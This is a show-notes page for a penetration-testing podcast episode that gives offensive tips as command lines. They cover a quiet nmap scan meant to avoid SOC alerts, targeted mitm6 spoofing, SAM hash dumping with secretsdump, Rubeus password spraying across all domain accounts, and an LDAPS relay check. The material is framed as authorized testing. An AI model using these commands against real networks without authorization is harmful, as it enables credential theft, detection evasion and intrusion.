7MS #514: Tales of Pentest Pwnage - Part 34

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include: I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd Using secretsdump to target a single host: secretsdump.py -target-ip localadmin:@ -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error! Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold! LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

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7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.